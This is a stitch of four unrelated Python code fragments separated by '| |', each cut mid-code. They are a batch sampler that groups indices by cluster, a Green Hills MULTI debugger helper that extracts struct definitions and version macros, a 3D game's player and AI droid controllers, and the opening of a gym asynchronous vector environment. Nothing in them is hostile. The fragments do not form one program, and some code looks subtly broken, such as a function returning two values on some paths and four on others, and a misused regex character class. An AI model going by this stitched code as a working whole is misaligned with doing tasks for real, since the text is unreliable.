# splits each cluster in batch_size, and merge as a list of tensors
splits = [c.split(self.batch_size) for c in permuted_clusters]
merged = tuple(itertools.chain.from_iterable(splits))
# now each batch internally has the right order, but
# they are grouped by clusters. Find the permutation between
# different batches that brings them as close as possible to
# the order that we have in the sampler. For that, we will consider the
# ordering as coming from the first element of each batch, and sort
# correspondingly
first_element_of_batch = [t[0].item() for t in merged]
# get and inverse mapping from sampled indices and the position where
# they occur (as returned by the sampler)
inv_sampled_ids_map = {v: k for k, v in enumerate(sampled_ids.tolist())}
# from the first element in each batch, get a relative ordering
first_index_of_batch = torch.as_tensor(
[inv_sampled_ids_map[s] for s in first_element_of_batch]
)
# permute the batches so that they approximately follow the order
# from the sampler
permutation_order = first_index_of_batch.sort(0)[1].tolist()
# finally, permute the batches
batches = [merged[i].tolist() for i in permutation_order]
if self.drop_uneven:
kept = []
for batch in batches:
if len(batch) == self.batch_size:
kept.append(batch)
batches = kept
return batches
def __iter__(self):
if self._can_reuse_batches:
batches = self._batches
self._can_reuse_batches = False
else:
batches = self._prepare_batches()
| |
in txtLine): continue
if dataObjectName + ';' in txtLine or dataObjectName + '[' in txtLine:
txtLine = txtLine.strip()
txtLine = re.sub('^ +', '', txtLine)
txtLine = re.sub(' +', ' ', txtLine)
if objectDeclarationString.search(txtLine):
m = objectDeclarationString.search(txtLine)
typeDefName = m.group(1)
return typeDefName
elif objectDeclarationStringStruct.search(txtLine):
m = objectDeclarationStringStruct.search(txtLine)
typeDefName = m.group(1)
return typeDefName
return typeDefName
def getAllFwVersionMacros(self):
"""Performs an extraction of the macro definitions from GHS."""
objectDeclarationMajorVer = re.compile('#define +([a-zA-Z0-9_]+_MAJOR) +(\d+)')
objectDeclarationMinorVer = re.compile('#define +([a-zA-Z0-9_]+_MINOR) +(\d+)')
for filepath in self.fileList:
for txtLine in open(filepath, 'r'):
if matchSequence[2].match(txtLine): continue
if objectDeclarationMajorVer.search(txtLine):
m = objectDeclarationMajorVer.search(txtLine)
self.versionList.append([m.group(1), m.group(2)])
elif objectDeclarationMinorVer.search(txtLine):
m = objectDeclarationMinorVer.search(txtLine)
self.versionList.append([m.group(1), m.group(2)])
return
def getFwMacroValue(self, macroName):
"""Performs an extraction of the definition from GHS."""
macroSearchPatternDecimal = re.compile('#define +%s +(\d+)' % macroName)
macroSearchPatternHex = re.compile('#define +%s +(0x[0-9a-fA-F]+)' % macroName)
for filepath in self.fileList:
for txtLine in open(filepath, 'r'):
if matchSequence[2].match(txtLine): continue
if macroSearchPatternDecimal.search(txtLine):
m = macroSearchPatternDecimal.search(txtLine)
return int(m.group(1))
elif macroSearchPatternHex.search(txtLine):
m = macroSearchPatternHex.search(txtLine)
return int(m.group(1), 16)
return None
def getTypeDefStruct(self, typeDefName):
"""Performs an extraction struct of the definitions from GHS."""
objectDeclarationString = re.compile('\} %s;' % typeDefName)
objectDeclarationStringWithTypedef = re.compile('typedef +([a-zA-Z0-9_]+_t) +%s;' % typeDefName)
objectDeclarationStringAlterStruct = re.compile('([a-zA-Z0-9_]+_t) +%s([[])' % typeDefName)
for filepath in self.fileList:
iFile = open(filepath, 'r')
lines = iFile.readlines()
iFile.close()
for i in range(len(lines)):
if typeDefName not in lines[i]: continue
txtLine = lines[i].strip()
txtLine = re.sub('^ +', '', txtLine)
txtLine = re.sub(' +', ' ', txtLine)
if matchSequence[2].match(txtLine): continue
if objectDeclarationString.search(txtLine) or \
objectDeclarationStringWithTypedef.search(txtLine) or \
objectDeclarationStringAlterStruct.search(txtLine):
return filepath, typeDefName, i ### Last param is 0-based lineNum where the typeDefName is found
return None, None, None
def isUserAdmin(self):
"""Performs an admin check for execution."""
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def runShellCmd(self, multicmd):
"""Performs a run command for GHS."""
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=multicmd)
def executeMultiScript(self, command):
"""Performs an execution for the GHS script."""
try:
# print("Platform: ", str(platform.system()))
if platform.system() == 'Linux':
### Just in case we need to do something different for Linux
self.runCmd(command)
elif platform.system() == 'Windows':
### Just in case we need to do something different for Windows
self.runCmd(command)
print("\nCommand: %s" % command)
except:
print("Failed Multi execution")
if ENABLE_DEBUG_ENTER: quit(10)
def appendNewSubStructs(self, tempSubStructDefFile):
"""Performs sub struct extraction."""
try:
tmpFileExists = os.path.isfile(tempSubStructDefFile)
if tmpFileExists:
iFile = open(tempSubStructDefFile, 'r')
lines = iFile.readlines()
iFile.close()
subFileExists = os.path.isfile(self.subStructDefFile)
if subFileExists:
oFile = open(self.subStructDefFile, 'a+')
for line in lines[6:]: ### Skip over the first 7 MULTI Debugger startup text lines
oFile.write(line)
oFile.close()
else:
oFile = open(self.subStructDefFile, 'w+')
for line in lines:
oFile.write(line)
oFile.close()
if ENABLE_DEBUG_ENTER: quit(11)
else:
if ENABLE_DEBUG_ENTER: quit(12)
except:
print("Failed appendNewSubStructs execution")
if ENABLE_DEBUG_ENTER: quit(13)
def extractArraySubStructs(self):
"""Performs array type extraction within a struct type."""
tempSubStructList = set()
if self.recursive:
if (self.verbose): print("\n recursive extractArraySubStructs call")
subFileExists = os.path.isfile(self.subStructDefFile)
if subFileExists:
fp = open(self.subStructDefFile, 'r')
else:
self.recursive = False
if ENABLE_DEBUG_ENTER: quit(14)
return
else:
if (self.verbose): print("\n Initial extractArraySubStructs call")
subFileExists = os.path.isfile(self.structDefFile)
if subFileExists:
fp = open(self.structDefFile, 'r')
else:
self.recursive = False
if ENABLE_DEBUG_ENTER: quit(15)
return
lines = fp.readlines()
# print("\n Closing " + str(fp))
fp.close()
objectInStructArray = re.compile('struct ([a-zA-Z0-9_]+_t) (([a-zA-Z0-9_]+)([[]))')
objectInUnionArray = re.compile('union ([a-zA-Z0-9_]+_t) (([a-zA-Z0-9_]+)([[]))')
for line in lines:
if objectInStructArray.search(line):
m = objectInStructArray.search(line)
if (m.group(1) not in self.subStructList):
tempSubStructList.add(m.group(1))
self.subStructList.add(m.group(1))
elif objectInUnionArray.search(line):
m = objectInUnionArray.search(line)
if (m.group(1) not in self.subStructList):
tempSubStructList.add(m.group(1))
self.subStructList.add(m.group(1))
if self.options.verbose:
print("subStructList: ", self.subStructList)
print("tempSubStructList:", tempSubStructList)
# print("\n Opening " + str(self.subStructMultiCmdFile))
multiCmdFile = open(self.subStructMultiCmdFile, 'w+')
multiCmdFile.write('_LINES = 1000\n')
for i in range(len(tempSubStructList)):
if list(tempSubStructList)[i] is not None:
multiCmdFile.write('mprintf(\"SubstructBegin==>%s\\n\")\n' % (list(tempSubStructList)[i]))
multiCmdFile.write(list(tempSubStructList)[i] + '\n')
multiCmdFile.write("sizeof(%s)\n" % (list(tempSubStructList)[i]))
multiCmdFile.write('mprintf(\"SubstructEnd==>%s\\n\")\n' % (list(tempSubStructList)[i]))
else:
multiCmdFile.write('mprintf(\"SubstructBegin==>%s\\n\")\n' % (list(tempSubStructList)[i]))
multiCmdFile.write('struct {\n')
multiCmdFile.write('{ ' + list(tempSubStructList)[i] + '\n')
multiCmdFile.write("0")
multiCmdFile.write('mprintf(\"SubstructEnd==>%s\\n\")\n' % (list(tempSubStructList)[i]))
if ENABLE_DEBUG_ENTER: quit(16)
multiCmdFile.write('quitall\n') ### Exit multi gracefully
# print("\n Closing " + str(multiCmdFile))
multiCmdFile.close()
tempSubStructDefFile = os.path.join(self.outDir, fname_tempSubStructDefs)
if (len(tempSubStructList) > 0):
if self.recursive:
command = '%s %s -nodisplay -p %s -RO %s' % (
self.multiExe, self.elfFile, self.subStructMultiCmdFile, tempSubStructDefFile)
else:
command = '%s %s -nodisplay -p %s -RO %s' % (
self.multiExe, self.elfFile, self.subStructMultiCmdFile, self.subStructDefFile)
if platform.system() == 'Linux':
### Just in case we need to do something different for Linux
self.runCmd(command)
elif platform.system() == 'Windows':
### Just in case we need to do something different for Windows
self.runCmd(command)
if self.recursive:
if os.path.exists(tempSubStructDefFile):
print(" Appending new sub structures 1.")
self.appendNewSubStructs(tempSubStructDefFile)
if os.path.exists(tempSubStructDefFile):
print(" Deleting temp structures 2.")
os.remove(tempSubStructDefFile)
self.recursive = True
print(" Extracting new sub structures 3.")
self.extractArraySubStructs()
def searchVersionMajorMinor(self, fileName, typeDefStructName, lineNum):
"""Performs version lookup for a structure."""
verMajorMacro = None
verMinorMacro = None
versionMajor = 0xBADD
versionMinor = 0xC0DE
iFile = open(fileName, 'r')
lines = iFile.readlines()
iFile.close()
if typeDefStructName not in lines[lineNum]:
print("Incorrect/inconsistent parameters being passed into searchVersionMajorMinor")
return None, None
structStartLine = 0
for i in range(lineNum, 0, -1):
if re.search('typedef [union|struct]', lines[i]):
structStartLine = i
break
if (structStartLine == 0): return None, None
for i in range(structStartLine, lineNum):
line = lines[i].strip()
if re.search('^\/\/', line): continue
if (line == ''): continue
# print line
if ('testCmdVersion_t' in line) and ('_MAJOR' in line) and ('_MINOR' in line):
if re.search('[\/<, ]([A-Z0-9_]+_MAJOR)', line):
m = re.search('[\/< ]([A-Z0-9_]+_MAJOR)', line)
verMajorMacro = m.group(1)
if re.search('[\/<, ]([A-Z0-9_]+_MINOR)', line):
m = re.search('[\/< ]([A-Z0-9_]+_MINOR)', line)
verMinorMacro = m.group(1)
for v in self.versionList:
if (verMajorMacro is not None) and (verMajorMacro in v[0]): versionMajor = int(v[1])
if (verMinorMacro is not None) and (verMinorMacro in v[0]): versionMinor = int(v[1])
if (versionMajor != 0xBADD) and (versionMinor != 0xC0DE): break
return verMajorMacro, versionMajor, verMinorMacro, versionMinor
def getAllStructNames(self):
"""Extract the struct names from definition file."""
try:
structDefFileExists = os.path.isfile(self.structDefFile)
if structDefFileExists:
iFile = open(self.structDefFile, 'r')
lines = iFile.readlines()
iFile.close()
isDetected = None
# isPointerDetected = None
for l in lines:
if TRUNK == "SXP" and not ENABLE_CLANG:
isDetected = matchSequence[22].search(l)
# print (" Attempt detect SXP name: " + str(l))
elif TRUNK == "NAND" and not ENABLE_CLANG:
isDetected = matchSequence[21].search(l)
# print (" Attempt detect member NAND name: " + str(l))
elif ENABLE_CLANG:
isDetected = detectedStructureMainName.search(l)
# print (" Attempt detect CLang name: " + str(l))
if isDetected:
m = isDetected
if (m.group(1) not in self.structNameList):
# print (" [Found] member name: " + str(m.group(1)))
# isPointerDetected = detectSimpleStructOrUnionPointer.search(l) # isPointerDetected = detectBasicPointer.search(l)
# if (isPointerDetected):
# print (" [Found] pointer: " + str(m.group(1)))
# # Mark the struct as not needed and use basic type. Mark self.isPointer = 1 later
self.structNameList.append(m.group(1))
# else:
# print (" <Duplicate> member name: " + str(m.group(1)))
# else:
# print (" Nothing member: " + str(l))
else:
iFile = open(self.structDefFile, 'w+')
iFile.close()
try:
subStructDefFileExists = os.path.isfile(self.subStructDefFile)
if subStructDefFileExists:
iFile = open(self.subStructDefFile, 'r')
lines = iFile.readlines()
iFile.close()
for l in lines:
# isAnonymousName = detectedAnonymousName.search(l)
# if isAnonymousName:
# print (" Attempt detect isAnonymousName: " + str(l))
if TRUNK == "NAND" and not ENABLE_CLANG:
isDetected = matchSequence[23].search(l)
# print (" Attempt detect sub-member NAND name: " + str(l))
elif TRUNK == "SXP" and not ENABLE_CLANG:
isDetected = matchSequence[24].search(l)
# print (" Attempt detect sub-member SXP name: " + str(l))
elif ENABLE_CLANG:
isDetected = detectedStructureSubName.search(l)
# print (" Attempt detect sub-member CLang name: " + str(l))
if isDetected:
m = isDetected
if (m.group(1) not in self.structNameList):
# print (" [Found] sub-member name: " + str(m.group(1)))
self.structNameList.append(m.group(1))
# else:
# print (" <Duplicate> sub-member: " + str(l))
# else:
# print (" Nothing sub-member: " + str(l))
else:
iFile = open(self.subStructDefFile, 'w+')
iFile.close()
if ENABLE_DEBUG_ENTER: quit(17)
except BaseException as error:
print('An exception occurred: {}'.format(error))
if ENABLE_DEBUG_ENTER: quit(17)
except:
print('An exception occurred: {}'.format("def getAllStructNames - substruct"))
if ENABLE_DEBUG_ENTER: quit(17)
except BaseException as error:
print('An exception occurred: {}'.format(error))
if ENABLE_DEBUG_ENTER: quit(18)
except:
print('An exception occurred: {}'.format("def getAllStructNames"))
if ENABLE_DEBUG_ENTER: quit(19)
def getAllStructSizes(self):
"""Performs an extraction of the definitions from GHS."""
self.getAllStructNames()
multiCmdFile = open(self.structSizeMultiCmdFile, 'w+')
multiCmdFile.write('_LINES = 10000\n')
for s in self.structNameList:
multiCmdFile.write('mprintf(\"sizeof(%s)=%%i\\n\",sizeof(%s))\n' % (s, s))
multiCmdFile.write('quitall\n') ### Exit multi gracefully
multiCmdFile.close()
command = '%s %s -nodisplay -p %s -RO %s' % (
self.multiExe, self.elfFile, self.structSizeMultiCmdFile, self.structSizeFile)
self.executeMultiScript(command)
def extractCstructs(self):
"""Performs an extraction of the definitions from GHS."""
self.getAllFwVersionMacros()
| |
if self.zoomed:
self.toggleZoom()
self.currentCrosshair = self.entity.components[self.activeWeapon].defaultCrosshair
if self.keyMap["alternate-action"]:
self.keyMap["alternate-action"] = False
if self.entity.special is not None:
self.entity.special.enable()
if self.currentCrosshair == -1:
self.currentCrosshair = self.entity.components[self.activeWeapon].defaultCrosshair
if self.zoomTime != -1:
blend = min(1.0, (engine.clock.time -
self.zoomTime) / self.totalZoomTime)
self.fov = self.currentFov + \
((self.desiredFov - self.currentFov) * blend)
self.cameraOffset = self.currentCameraOffset + \
((self.desiredCameraOffset - self.currentCameraOffset) * blend)
if base.camLens is not None: # If we're a daemon.
base.camLens.setFov(self.fov)
if blend >= 1.0:
self.zoomTime = -1
self.mouse.update()
self.angleX = self.mouse.getX()
self.angleY = self.mouse.getY()
angleX = self.angleX
if self.isPlatformMode:
angleX = 0
move = True
if self.keyMap["left"] and self.keyMap["forward"]:
angleX += (.75 * math.pi)
elif self.keyMap["left"] and self.keyMap["down"]:
angleX += (.25 * math.pi)
elif self.keyMap["right"] and self.keyMap["forward"]:
angleX -= (.75 * math.pi)
elif self.keyMap["right"] and self.keyMap["down"]:
angleX -= (.25 * math.pi)
elif self.keyMap["left"]:
angleX += (math.pi / 2)
elif self.keyMap["right"]:
angleX -= (math.pi / 2)
elif self.keyMap["forward"]:
angleX += math.pi
elif not self.keyMap["down"]:
move = False
angularVel = self.entity.getAngularVelocity()
maxSpeed = self.maxSpeed
torque = self.torque
self.sprinting = self.keyMap["sprint"]
if self.keyMap["sprint"]:
maxSpeed *= 2
torque *= 2
if move:
self.entity.addTorque(Vec3(engine.impulseToForce(
torque * math.cos(angleX)), engine.impulseToForce(-torque * math.sin(angleX)), 0))
if angularVel.length() > maxSpeed:
angularVel.normalize()
self.entity.setAngularVelocity(angularVel * maxSpeed)
else:
self.entity.addTorque(Vec3(engine.impulseToForce(-angularVel.getX() * 20),
engine.impulseToForce(-angularVel.getY() * 20),
engine.impulseToForce(-angularVel.getZ() * 20)))
if self.isPlatformMode:
self.pickRay.setOrigin(Point3(self.entity.getPosition()))
self.pickRay.setDirection(Vec3(0, -1, 0))
else:
camera.setHpr(-math.degrees(self.angleX) + entityGroup.cameraShakeX *
0.5, math.degrees(self.angleY) + entityGroup.cameraShakeY * 0.5, 0)
cameraPos = render.getRelativeVector(camera, self.cameraOffset)
camera.setPos(self.entity.getPosition() + cameraPos)
self.pickRay.setFromLens(base.camNode, 0, 0)
target = None
if engine.clock.time - self.lastTargetCheck > 0.05:
self.lastTargetCheck = engine.clock.time
queue = aiWorld.getRayCollisionQueue(self.pickRayNP)
camDistance = (camera.getPos() - self.entity.getPosition()
).length() + self.entity.radius
for i in range(queue.getNumEntries()):
entry = queue.getEntry(i)
t = entry.getSurfacePoint(render)
targetVector = camera.getPos() - t
if camDistance < targetVector.length():
target = t
break
if target is None:
self.targetPos = camera.getPos() + (render.getRelativeVector(camera,
Vec3(0, 1, 0)) * self.targetDistance)
else:
self.targetPos = target
self.targetDistance = (target - camera.getPos()).length()
origin = camera.getPos()
dir = render.getRelativeVector(camera, Vec3(0, 1, 0))
closestDot = 0.95
self.targetedEnemy = None
for enemy in (
x for x in list(entityGroup.entities.values()) if isinstance(
x, entities.DropPod) or (
(isinstance(
x, entities.Actor) and not x.getTeam().isAlly(
self.entity.getTeam()) and not x.cloaked))):
vector = enemy.getPosition() - origin
vector.normalize()
dot = vector.dot(dir)
if dot > closestDot:
closestDot = dot
self.targetedEnemy = enemy
self.entity.components[self.activeWeapon].zoomed = self.zoomed
if self.keyMap["fire"]:
if target is not None:
direction = target - self.entity.getPosition()
else:
direction = render.getRelativeVector(
self.pickRayNP, self.pickRay.getDirection())
direction = (camera.getPos() + (direction * 500)
) - self.entity.getPosition()
direction.normalize()
self.entity.components[self.activeWeapon].fire()
if self.entity.components[self.activeWeapon].reloadActive and self.zoomed:
self.toggleZoom() # Zoom out if the weapon reloaded automatically
p = DroidController.serverUpdate(
self, aiWorld, entityGroup, packetUpdate)
# Update camera position if it's been updated by
# DroidController.serverUpdate. That way the screen doesn't jitter.
if not self.isPlatformMode:
camera.setPos(self.entity.getPosition() + cameraPos)
p.add(net.Boolean(self.sprinting))
cmds = len(self.commands)
p.add(net.Uint8(cmds))
if cmds > 0:
self.addCriticalPacket(p, packetUpdate)
for c in self.commands:
p.add(net.Uint8(c[0])) # The ID of our actor
p.add(net.Boolean(c[1] == -1)) # True if this is a special attack
if c[1] != -1: # Setting the bot's target
p.add(net.Uint8(c[1])) # The ID of the target entity
del self.commands[:]
return p
def clientUpdate(self, aiWorld, entityGroup, iterator=None):
DroidController.clientUpdate(self, aiWorld, entityGroup, iterator)
if iterator is not None:
self.sprinting = net.Boolean.getFrom(iterator)
cmds = net.Uint8.getFrom(iterator)
for i in range(cmds):
id = net.Uint8.getFrom(iterator)
entity = entityGroup.getEntity(id)
if entity is None: # Do nothing
if net.Boolean.getFrom(iterator):
net.Uint8.getFrom(iterator)
else:
controller = entity.controller
if net.Boolean.getFrom(iterator):
controller.enableSpecial()
else:
target = entityGroup.getEntity(
net.Uint8.getFrom(iterator))
if target == self.entity:
controller.setTarget(None)
else:
controller.setTarget(target)
particles.UnitHighlightParticleGroup.draw(self.entity.getPosition(
), self.entity.getTeam().color, self.entity.radius + 0.4)
weapon = self.entity.components[self.activeWeapon]
if weapon.selected and self.sprinting:
weapon.hide()
# If the melee claw isn't ready
if not self.entity.components[0].isReady():
weapon.hide()
elif not weapon.selected and not self.sprinting:
weapon.show()
def delete(self, killed=False):
# If we're a local player and we're not running in a daemon.
if self.entity.isLocal and base.camLens is not None:
base.camLens.setFov(self.defaultFov)
DroidController.delete(self, killed)
class AIController(DroidController):
"""The AIController uses the ai module's pathfinding algorithms to go places.
At the moment, only BasicDroid actors are supported."""
def __init__(self):
DroidController.__init__(self)
self.nearestEnemy = None
self.targetedEnemy = None
self.moving = False
self.path = ai.Path()
self.lastAiNode = None
self.lastTargetAiNode = None
self.lastPathFind = engine.clock.time + random() + 1.0
self.lastMovementUpdate = engine.clock.time + random() + 1.0
self.direction = Vec3()
self.lastShot = 0
self.lastTargetCheck = 0
self.enemyLastVisible = False
self.lastDodgeDirectionChange = 0
self.reverseDodgeDirection = False
def buildSpawnPacket(self):
p = DroidController.buildSpawnPacket(self)
p.add(net.Uint8(self.entity.teamIndex))
return p
@staticmethod
def readSpawnPacket(aiWorld, entityGroup, iterator, entity=None):
entity = entities.BasicDroid(
aiWorld.world, aiWorld.space, AIController(), local=False)
entity = DroidController.readSpawnPacket(
aiWorld, entityGroup, iterator, entity)
entity.teamIndex = net.Uint8.getFrom(iterator)
return entity
def actorDamaged(self, entity, damage, ranged):
DroidController.actorDamaged(self, entity, damage, ranged)
if not isinstance(entity, entities.BasicDroid) or entity.cloaked:
return
def enableSpecial(self):
if self.entity.special is not None:
self.entity.special.enable()
def setTarget(self, target):
self.targetedEnemy = target
def pathCallback(self, path):
self.path = path
def serverUpdate(self, aiWorld, entityGroup, packetUpdate):
# PATH FIND UPDATE
if engine.clock.time - self.lastPathFind > 1.0:
self.lastPathFind = engine.clock.time
player = self.entity.getTeam().getPlayer()
if player is None and (
self.targetedEnemy is None or not self.targetedEnemy.active):
self.targetedEnemy = aiWorld.getNearestDropPod(
entityGroup, self.entity.getPosition())
if self.targetedEnemy is None:
self.targetedEnemy = aiWorld.getNearestEnemy(
entityGroup, self.entity.getPosition(), self.entity.getTeam())
if self.targetedEnemy is not None and self.targetedEnemy.active and isinstance(
self.targetedEnemy, entities.Actor):
self.nearestEnemy = self.targetedEnemy
elif self.nearestEnemy is None or not self.nearestEnemy.active or (self.nearestEnemy.getPosition() - self.entity.getPosition()).length() > 15:
self.nearestEnemy = aiWorld.getNearestEnemy(
entityGroup, self.entity.getPosition(), self.entity.getTeam())
aiNode = aiWorld.navMesh.getNode(
self.entity.getPosition(), self.entity.radius, self.lastAiNode)
targetAiNode = None
target = None
if self.targetedEnemy is not None and self.targetedEnemy.active:
target = self.targetedEnemy
elif self.entity.getTeam().getPlayer() is not None and self.entity.getTeam().getPlayer().active:
target = self.entity.getTeam().getPlayer()
if target is not None:
targetAiNode = aiWorld.navMesh.getNode(
target.getPosition(), target.radius)
if (target.getPosition() -
self.entity.getPosition()).length() > 10:
if (
targetAiNode is not None and aiNode is not None) and (
targetAiNode != self.lastTargetAiNode or (
aiNode != self.lastAiNode and (
aiNode not in self.path.nodes))):
ai.requestPath(
self.pathCallback,
aiNode,
targetAiNode,
self.entity.getPosition(),
target.getPosition(),
self.entity.radius + 0.5)
else:
self.path.clear()
self.path.end = target.getPosition() + Vec3(uniform(-12, 12), uniform(-12, 12), 0)
self.lastAiNode = aiNode
self.lastTargetAiNode = targetAiNode
# PATH FIND TO NEXT NODE
if engine.clock.time - self.lastMovementUpdate > 0.2:
self.lastMovementUpdate = engine.clock.time
self.moving = False
self.direction = Vec3()
if self.path is not None and self.path.hasNext():
self.moving = True
self.direction = self.path.current() - self.entity.getPosition()
if self.direction.length() < self.entity.radius + 2:
next(self.path)
self.direction.normalize()
elif self.path is not None and self.path.end is not None and (self.path.end - self.entity.getPosition()).length() > 4:
self.direction = self.path.end - self.entity.getPosition()
self.direction.normalize()
self.moving = True
# Simple obstacle avoidance
obj = entityGroup.getNearestPhysicsEntity(
self.entity.getPosition())
if obj is not None:
diff = obj.getPosition() - self.entity.getPosition()
if diff.length() < obj.radius + self.entity.radius + 1.5:
diff.setZ(0)
diff.normalize()
if self.direction.dot(diff) > 0.7:
up = Vec3(0, 0, 1)
self.direction = diff.cross(up)
if engine.clock.time - self.lastDodgeDirectionChange > 1.0:
self.lastDodgeDirectionChange = engine.clock.time
self.reverseDodgeDirection = random() > 0.5
if self.reverseDodgeDirection:
self.direction *= -1
# PHYSICS/MOVEMENT UPDATE
angularVel = self.entity.getAngularVelocity()
if self.moving:
self.entity.addTorque(
Vec3(
engine.impulseToForce(
-self.torque * self.direction.getY()),
engine.impulseToForce(
self.torque * self.direction.getX()),
0))
if angularVel.length() > self.maxSpeed:
angularVel.normalize()
self.entity.setAngularVelocity(angularVel * self.maxSpeed)
else:
self.entity.addTorque(Vec3(engine.impulseToForce(-angularVel.getX() * 6),
engine.impulseToForce(-angularVel.getY() * 6),
engine.impulseToForce(-angularVel.getZ() * 6)))
# WEAPON UPDATE
weapon = self.entity.components[self.activeWeapon]
if weapon.burstTimer == -1 and engine.clock.time - \
weapon.burstDelayTimer >= weapon.burstDelay:
if self.nearestEnemy is not None and self.nearestEnemy.active:
vector = self.nearestEnemy.getPosition() - self.entity.getPosition()
if vector.length() < weapon.range:
vector.normalize()
if engine.clock.time - self.lastTargetCheck > 1.0:
self.lastTargetCheck = engine.clock.time
self.enemyLastVisible = entityGroup.getEntityFromEntry(aiWorld.getFirstCollision(
self.entity.getPosition() + (vector * (self.entity.radius + 0.2)), vector)) == self.nearestEnemy
if self.enemyLastVisible:
weapon.burstTimer = engine.clock.time
weapon.burstDelayTimer = -1
weapon.burstTime = weapon.burstTimeBase * \
((random() * 1.5) + 1)
weapon.shotDelay = weapon.shotDelayBase * \
((random() * 1.5) + 1)
if weapon.burstTimer != -1 and engine.clock.time - \
weapon.burstTimer <= weapon.burstTime and self.nearestEnemy is not None and self.nearestEnemy.active:
if engine.clock.time - self.lastShot > weapon.shotDelay:
if weapon.fire():
weapon.burstDelayTimer = engine.clock.time
weapon.burstDelay = weapon.burstDelayBase * \
((random() * 1.5) + 1)
self.lastShot = engine.clock.time
else:
weapon.burstTimer = -1
if self.nearestEnemy is not None and self.nearestEnemy.active:
self.targetPos = self.nearestEnemy.getPosition()
if weapon.firing:
vector = self.targetPos - self.entity.getPosition()
distance = vector.length()
vector /= distance
coefficient = uniform(weapon.accuracy - 1.0,
1.0 - weapon.accuracy) * 2.0
up = Vec3(0, 0, 1)
cross = vector.cross(up)
self.targetPos += up * coefficient
self.targetPos += cross * coefficient
p = DroidController.serverUpdate(
self, aiWorld, entityGroup, | |
<filename>reinforcement_learning/gym/vector/async_vector_env.py
import numpy as np
import multiprocessing as mp
import time
import sys
from enum import Enum
from copy import deepcopy
from reinforcement_learning.gym import logger
from reinforcement_learning.gym.vector.vector_env import VectorEnv
from reinforcement_learning.gym.error import (AlreadyPendingCallError, NoAsyncCallError,
ClosedEnvironmentError)
from reinforcement_learning.gym.vector.utils import (create_shared_memory, create_empty_array,
write_to_shared_memory, read_from_shared_memory,
concatenate, CloudpickleWrapper, clear_mpi_env_vars)
__all__ = ['AsyncVectorEnv']
class AsyncState(Enum):
DEFAULT = 'default'
WAITING_RESET = 'reset'
WAITING_STEP = 'step'
class AsyncVectorEnv(VectorEnv):
"""Vectorized environment that runs multiple environments in parallel. It
uses `multiprocessing` processes, and pipes for communication.
Parameters
----------
env_fns : iterable of callable
Functions that create the environments.
observation_space : `gym.spaces.Space` instance, optional
Observation space of a single environment. If `None`, then the
observation space of the first environment is taken.
action_space : `gym.spaces.Space` instance, optional
Action space of a single environment. If `None`, then the action space
of the first environment is taken.
shared_memory : bool (default: `True`)
If `True`, then the observations from the worker processes are
communicated back through shared variables. This can improve the
efficiency if the observations are large (e.g. images).
copy : bool (default: `True`)
If `True`, then the `reset` and `step` methods return a copy of the
observations.
context : str, optional
Context for multiprocessing. If `None`, then the default context is used.
Only available in Python 3.
daemon : bool (default: `True`)
If `True`, then subprocesses have `daemon` flag turned on; that is, they
will quit if the head process quits. However, `daemon=True` prevents
subprocesses to spawn children, so for some environments you may want
to have it set to `False`
worker : function, optional
WARNING - advanced mode option! If set, then use that worker in a subprocess
instead of a default one. Can be useful to override some inner vector env
logic, for instance, how resets on done are handled. Provides high
degree of flexibility and a high chance to shoot yourself in the foot; thus,
if you are writing your own worker, it is recommended to start from the code
for `_worker` (or `_worker_shared_memory`) method below, and add changes
"""
def __init__(self, env_fns, observation_space=None, action_space=None,
shared_memory=True, copy=True, context=None, daemon=True, worker=None):
try:
ctx = mp.get_context(context)
except AttributeError:
logger.warn('Context switching for `multiprocessing` is not '
'available in Python 2. Using the default context.')
ctx = mp
self.env_fns = env_fns
self.shared_memory = shared_memory
self.copy = copy
if (observation_space is None) or (action_space is None):
dummy_env = env_fns[0]()
observation_space = observation_space or dummy_env.observation_space
action_space = action_space or dummy_env.action_space
dummy_env.close()
del dummy_env
super(AsyncVectorEnv, self).__init__(num_envs=len(env_fns),
observation_space=observation_space, action_space=action_space)
if self.shared_memory:
_obs_buffer = create_shared_memory(self.single_observation_space,
n=self.num_envs, ctx=ctx)
self.observations = read_from_shared_memory(_obs_buffer,
self.single_observation_space, n=self.num_envs)
else:
_obs_buffer = None
self.observations = create_empty_array(
self.single_observation_space, n=self.num_envs, fn=np.zeros)
self.parent_pipes, self.processes = [], []
self.error_queue = ctx.Queue()
target = _worker_shared_memory if self.shared_memory else _worker
target = worker or target
with clear_mpi_env_vars():
for idx, env_fn in enumerate(self.env_fns):
parent_pipe, child_pipe = ctx.Pipe()
process = ctx.Process(target=target,
name='Worker<{0}>-{1}'.format(type(self).__name__, idx),
args=(idx, CloudpickleWrapper(env_fn), child_pipe,
parent_pipe, _obs_buffer, self.error_queue))
self.parent_pipes.append(parent_pipe)
self.processes.append(process)
process.daemon = daemon
process.start()
child_pipe.close()
self._state = AsyncState.DEFAULT
self._check_observation_spaces()
def seed(self, seeds=None):
self._assert_is_running()
if seeds is None:
seeds = [None for _ in range(self.num_envs)]
if isinstance(seeds, int):
seeds = [seeds + i for i in range(self.num_envs)]
assert len(seeds) == self.num_envs
if self._state != AsyncState.DEFAULT:
raise AlreadyPendingCallError('Calling `seed` while waiting '
'for a pending call to `{0}` to complete.'.format(
self._state.value), self._state.value)
for pipe, seed in zip(self.parent_pipes, seeds):
pipe.send(('seed', seed))
_, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
def reset_async(self):
self._assert_is_running()
if self._state != AsyncState.DEFAULT:
raise AlreadyPendingCallError('Calling `reset_async` while waiting '
'for a pending call to `{0}` to complete'.format(
self._state.value), self._state.value)
for pipe in self.parent_pipes:
pipe.send(('reset', None))
self._state = AsyncState.WAITING_RESET
def reset_wait(self, timeout=None):
"""
Parameters
----------
timeout : int or float, optional
Number of seconds before the call to `reset_wait` times out. If
`None`, the call to `reset_wait` never times out.
Returns
-------
observations : sample from `observation_space`
A batch of observations from the vectorized environment.
"""
self._assert_is_running()
if self._state != AsyncState.WAITING_RESET:
raise NoAsyncCallError('Calling `reset_wait` without any prior '
'call to `reset_async`.', AsyncState.WAITING_RESET.value)
if not self._poll(timeout):
self._state = AsyncState.DEFAULT
raise mp.TimeoutError('The call to `reset_wait` has timed out after '
'{0} second{1}.'.format(timeout, 's' if timeout > 1 else ''))
results, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
self._state = AsyncState.DEFAULT
if not self.shared_memory:
